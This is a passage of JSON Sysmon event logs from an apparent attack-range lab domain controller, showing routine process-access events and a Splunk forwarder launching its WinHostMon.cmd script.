2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.107\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001083AF0500}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.107","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001083AF0500}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.218\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-001016B50500}\r\nProcessId: 4832\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.218","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-001016B50500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001016B50500}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001016B50500}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001016B50500}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001016B50500}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.